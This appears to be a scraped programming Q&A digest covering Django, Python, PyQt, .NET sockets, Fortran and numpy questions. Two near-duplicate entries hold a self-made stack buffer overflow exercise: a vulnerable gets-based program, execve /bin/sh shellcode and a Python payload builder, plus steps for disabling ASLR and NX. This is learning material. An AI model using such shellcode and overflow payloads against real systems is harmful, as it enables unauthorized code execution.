0002_auto__add_pricingrule product_types (*) 0001_initial (*) 0002_auto__add_field_producttype_meta_title__add_field_producttype_meta_des (*) 0003_auto__add_field_producttype_summary__add_field_producttype_description products (*) 0001_initial (*) 0002_auto__del_field_product_is_featured (*) 0003_auto__chg_field_product_meta_keywords__chg_field_product_meta_descript (*) 0004_auto shipping (*) 0001_initial (*) 0002_auto__add_field_shippingmethod_includes_tax__add_field_shippingmethod_ (*) 0003_auto__add_field_shippingmethod_order (*) 0004_auto__del_field_shippingmethod_tax_rate__del_field_shippingmethod_incl (*) 0005_auto__del_field_shippingrule_enabled tax (*) 0001_initial (*) 0002_auto__add_field_taxrate_internal_name (*) 0003_initial_internal_names (*) 0004_auto__add_unique_taxrate_internal_name (*) 0005_force_unique_taxrate_name (*) 0006_auto__add_unique_taxrate_name After that some images source were something like this: src="cache/1e/bd/1ebd719910aa843238028edd5fe49e71.jpg" Is any1 could help me with syncdb pledase?

    Read the article

  • Python: speed up removal of every n-th element from list.

    - by ChristopheD
    I'm trying to solve this programming riddle and althought the solution (see code below) works correct, it is too slow for succesful submission. Any pointers as how to make this run faster? (removal of every n-th element from a list)? Or suggestions for a better algorithm to calculate the same; seems I can't think of anything else then brute-force for now... Basically the task at hand is: GIVEN: L = [2,3,4,5,6,7,8,9,10,11,........] 1. Take the first remaining item in list L (in the general case 'n'). Move it to the 'lucky number list'. Then drop every 'n-th' item from the list. 2. Repeat 1 TASK: Calculate the n-th number from the 'lucky number list' ( 1 <= n <= 3000) My current code (it calculates the 3000 first lucky numbers in about a second on my machine - but unfortunately too slow): """ SPOJ Problem Set (classical) 1798. Assistance Required URL: http://www.spoj.pl/problems/ASSIST/ """ sieve = range(3, 33900, 2) luckynumbers = [2] while True: wanted_n = input() if wanted_n == 0: break while len(luckynumbers) < wanted_n: item = sieve[0] luckynumbers.append(item) items_to_delete = set(sieve[::item]) sieve = filter(lambda x: x not in items_to_delete, sieve) print luckynumbers[wanted_n-1]

    Read the article

  • PyQt and unittest - how to handle signals and slots

    - by Einar
    Hello, some small application I'm developing uses a module I have written to check certain web services via a REST API. I've been trying to add unit tests to it so I don't break stuff, and I stumbled upon a problem. I use a lot of signal-slot connections to perform operations asynchronously. For example a typical test would be (pseudo-Python), with postDataDownloaded as a signal: def testConnection(self): "Test connection and posts retrieved" def length_test(): self.assertEqual(len(self.client.post_data), 5) self.client.postDataReady.connect(length_test) self.client.get_post_list(limit=5) Now, unittest will report this test to be "ok" when running, regardless of the result (as another slot is being called), even if asserts fail (I will get an unhandled AssertionError). Example when deliberatiely making the test fail: Test connection and posts retrieved ... ok [... more tests...] OK Traceback (most recent call last): [...] AssertionError: 4 != 5 The slot inside the test is merely an experiment: I get the same results if it's outside (instance method). I also have to add that the various methods I'm calling all make HTTP requests, which means they take a bit of time (I need to mock the request - in the mean time I'm using SimpleHTTPServer to fake the connections and give them proper data). Is there a way around this problem?

    Read the article

  • Binary stream 'NN' does not contain a valid BinaryHeader. Possible causes are invalid stream or obje

    - by FinancialRadDeveloper
    I am passing user defined classes over sockets. The SendObject code is below. It works on my local machine, but when I publish to the WebServer which is then communicating with the App Server on my own machine it fails. public bool SendObject(Object obj, ref string sErrMsg) { try { MemoryStream ms = new MemoryStream(); BinaryFormatter bf1 = new BinaryFormatter(); bf1.Serialize(ms, obj); byte[] byArr = ms.ToArray(); int len = byArr.Length; m_socClient.Send(byArr); return true; } catch (Exception e) { sErrMsg = "SendObject Error: " + e.Message; return false; } } I can do this fine if it is one class in my tools project and the other class about UserData just doesn't want to know. Frustrating! Ohh. I think its because the UserData class has a DataSet inside it. Funnily enough I have seen this work, but then after 1 request it goes loopy and I can't get it to work again. Anyone know why this might be? I have looked at comparing the dlls to make sure they are the same on the WebServer and on my local machine and they look to be so as I have turned on versioning in the AssemblyInfo.cs to double check. Edit: Ok it seems that the problem is with size. If I keep it under 1024 byes ( I am guessing here) it works on the web server and doesnt if it has a DataSet inside it.k In fact this is so puzzling I converted the DataSet to a string using ds.GetXml() and this also causes it to blow up. :( So it seems that across the network something with my sockets is wrong and doesn't want to read in the data. JonSkeet where are you. ha ha. I would offer Rep but I don't have any. Grr

    Read the article

  • Shellcode for a simple stack overflow: Exploited program with shell terminates directly after execve

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328 Debugging with gdb: $ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb) $ gdb buffer (gdb) run < exploit.txt Starting program: /home/henning/bo/buffer < exploit.txt Stackpointer 0x7fffffffe308 Jump to 0x7fffffffe308 process 4185 is executing new program: /bin/dash Program exited normally.

    Read the article

  • Pythonic mapping of an array (Beginner)

    - by scott_karana
    Hey StackOverflow, I've got a question related to a beginner Python snippet I've written to introduce myself to the language. It's an admittedly trivial early effort, but I'm still wondering how I could have written it more elegantly. The program outputs NATO phoenetic readable versions of an argument, such "H2O" - "Hotel 2 Oscar", or (lacking an argument) just outputs the whole alphabet. I mainly use it for calling in MAC addresses and IQNs, but it's useful for other phone support too. Here's the body of the relevant portion of the program: #!/usr/bin/env python import sys nato = { "a": 'Alfa', "b": 'Bravo', "c": 'Charlie', "d": 'Delta', "e": 'Echo', "f": 'Foxtrot', "g": 'Golf', "h": 'Hotel', "i": 'India', "j": 'Juliet', "k": 'Kilo', "l": 'Lima', "m": 'Mike', "n": 'November', "o": 'Oscar', "p": 'Papa', "q": 'Quebec', "r": 'Romeo', "s": 'Sierra', "t": 'Tango', "u": 'Uniform', "v": 'Victor', "w": 'Whiskey', "x": 'Xray', "y": 'Yankee', "z": 'Zulu', } if len(sys.argv) < 2: for n in nato.keys(): print nato[n] else: # if sys.argv[1] == "-i" # TODO for char in sys.argv[1].lower(): if char in nato: print nato[char], else: print char, As I mentioned, I just want to see suggestions for a more elegant way to code this. My first guess was to use a list comprehension along the lines of [nato[x] for x in sys.argv[1].lower() if x in nato], but that doesn't allow me to output any non-alphabetic characters. My next guess was to use map, but I couldn't format any lambdas that didn't suffer from the same corner case. Any suggestions? Maybe something with first-class functions? Messing with Array's guts? This seems like it could almost be a Code Golf question, but I feel like I'm just overthinking :)

    Read the article

  • Attempting my first fortran 95 program, to solve quadratic eqn. Getting weird errors.

    - by Damon
    So, I'm attempting my first program in Fortran, trying to solve quadratic eqn. I have double and triple checked my code and don't see anything wrong. I keep getting "Invalid character in name at (1)" and "Unclassifiable statement at (1)" at various locations. Any help would be greatly appreciated... ! This program solves quadratic equations ! of the form ax^2 + bx + c = 0. ! Record: ! Name: Date: Notes: ! Damon Robles 4/3/10 Original Code PROGRAM quad_solv IMPLICIT NONE ! Variables REAL :: a, b, c REAL :: discrim, root1, root2, COMPLEX :: comp1, comp2 CHARACTER(len=1) :: correct ! Prompt user for coefficients. WRITE(*,*) "This program solves quadratic equations " WRITE(*,*) "of the form ax^2 + bx + c = 0. " WRITE(*,*) "Please enter the coefficients a, b, and " WRITE(*,*) "c, separated by commas:" READ(*,*) a, b, c WRITE(*,*) "Is this correct: a = ", a, " b = ", b WRITE(*,*) " c = ", c, " [Y/N]? " READ(*,*) correct IF correct = N STOP IF correct = Y THEN ! Definition discrim = b**2 - 4*a*c ! Calculations IF discrim > 0 THEN root1 = (-b + sqrt(discrim))/(2*a) root2 = (-b - sqrt(discrim))/(2*a) WRITE(*,*) "This equation has two real roots. " WRITE(*,*) "x1 = ", root1 WRITE(*,*) "x2 = ", root2 IF discrim = 0 THEN root1 = -b/(2*a) WRITE(*,*) "This equation has a double root. " WRITE(*,*) "x1 = ", root1 IF discrim < 0 THEN comp1 = (-b + sqrt(discrim))/(2*a) comp2 = (-b - sqrt(discrim))/(2*a) WRITE(*,*) "x1 = ", comp1 WRITE(*,*) "x2 = ", comp2 PROGRAM END quad_solv Thanks in advance!

    Read the article

  • slicing a 2d numpy array

    - by MedicalMath
    The following code: import numpy as p myarr=[[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6],[0,1],[0,6]] copy=p.array(myarr) p.mean(copy)[:,1] Is generating the following error message: Traceback (most recent call last): File "<pyshell#3>", line 1, in <module> p.mean(copy)[:,1] IndexError: 0-d arrays can only use a single () or a list of newaxes (and a single ...) as an index I looked up the syntax at this link and I seem to be using the correct syntax to slice. However, when I type copy[:,1] into the Python shell, it gives me the following output, which is clearly wrong, and is probably what is throwing the error: array([1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6, 1, 6]) Can anyone show me how to fix my code so that I can extract the second column and then take the mean of the second column as intended in the original code above? EDIT: Thank you for your solutions. However, my posting was an oversimplification of my real problem. I used your solutions in my real code, and got a new error. Here is my real code with one of your solutions that I tried: filteredSignalArray=p.array(filteredSignalArray) logical=p.logical_and(EndTime-10.0<=matchingTimeArray,matchingTimeArray<=EndTime) finalStageTime=matchingTimeArray.compress(logical) finalStageFiltered=filteredSignalArray.compress(logical) for j in range(len(finalStageTime)): if j == 0: outputArray=[[finalStageTime[j],finalStageFiltered[j]]] else: outputArray+=[[finalStageTime[j],finalStageFiltered[j]]] print 'outputArray[:,1].mean() is: ',outputArray[:,1].mean() And here is the error message that is now being generated by the new code: File "mypath\myscript.py", line 1545, in WriteToOutput10SecondsBeforeTimeMarker print 'outputArray[:,1].mean() is: ',outputArray[:,1].mean() TypeError: list indices must be integers, not tuple Second EDIT: This is solved now that I added: outputArray=p.array(outputArray) above my code. I have been at this too many hours and need to take a break for a while if I am making these kinds of mistakes.

    Read the article

  • Shellcode for a simple stack overflow doesn't start a shell

    - by henning
    Hi, I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. Seems like the execve syscall fails. Any idea what's wrong? Running the shellcode standalone works just fine. Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code) Vulnerable file buffer.s: .data .fmtsp: .string "Stackpointer %p\n" .fmtjump: .string "Jump to %p\n" .text .global main main: push %rbp mov %rsp, %rbp sub $120, %rsp # calling printf without setting rax # to zero results in a segfault. why? xor %rax, %rax mov %rsp, %rsi mov $.fmtsp, %rdi call printf mov %rsp, %rdi call gets xor %rax, %rax mov $.fmtjump, %rdi mov 8(%rbp), %rsi call printf xor %rax, %rax leave ret shellcode.s .text .global main main: mov $0x68732f6e69622fff, %rbx shr $0x8, %rbx push %rbx mov %rsp, %rdi xor %rsi, %rsi xor %rdx, %rdx xor %rax, %rax add $0x3b, %rax syscall exploit.py shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05" stackpointer = "\x7f\xff\xff\xff\xe3\x28" output = shellcode output += 'a' * (120 - len(shellcode)) # fill buffer output += 'b' * 8 # override stored base pointer output += ''.join(reversed(stackpointer)) print output Compiled with: $ gcc -o buffer buffer.s $ gcc -o shellcode shellcode.s Started with: $ python exploit.py | ./buffer Stackpointer 0x7fffffffe328 Jump to 0x7fffffffe328

    Read the article

  • What is the most platform- and Python-version-independent way to make a fast loop for use in Python?

    - by Statto
    I'm writing a scientific application in Python with a very processor-intensive loop at its core. I would like to optimise this as far as possible, at minimum inconvenience to end users, who will probably use it as an uncompiled collection of Python scripts, and will be using Windows, Mac, and (mainly Ubuntu) Linux. It is currently written in Python with a dash of NumPy, and I've included the code below. Is there a solution which would be reasonably fast which would not require compilation? This would seem to be the easiest way to maintain platform-independence. If using something like Pyrex, which does require compilation, is there an easy way to bundle many modules and have Python choose between them depending on detected OS and Python version? Is there an easy way to build the collection of modules without needing access to every system with every version of Python? Does one method lend itself particularly to multi-processor optimisation? (If you're interested, the loop is to calculate the magnetic field at a given point inside a crystal by adding together the contributions of a large number of nearby magnetic ions, treated as tiny bar magnets. Basically, a massive sum of these.) # calculate_dipole # ------------------------- # calculate_dipole works out the dipole field at a given point within the crystal unit cell # --- # INPUT # mu = position at which to calculate the dipole field # r_i = array of atomic positions # mom_i = corresponding array of magnetic moments # --- # OUTPUT # B = the B-field at this point def calculate_dipole(mu, r_i, mom_i): relative = mu - r_i r_unit = unit_vectors(relative) #4pi / mu0 (at the front of the dipole eqn) A = 1e-7 #initalise dipole field B = zeros(3,float) for i in range(len(relative)): #work out the dipole field and add it to the estimate so far B += A*(3*dot(mom_i[i],r_unit[i])*r_unit[i] - mom_i[i]) / sqrt(dot(relative[i],relative[i]))**3 return B

    Read the article

< Previous Page | 45 46 47 48 49 50 51 52 53 54 55 56  | Next Page >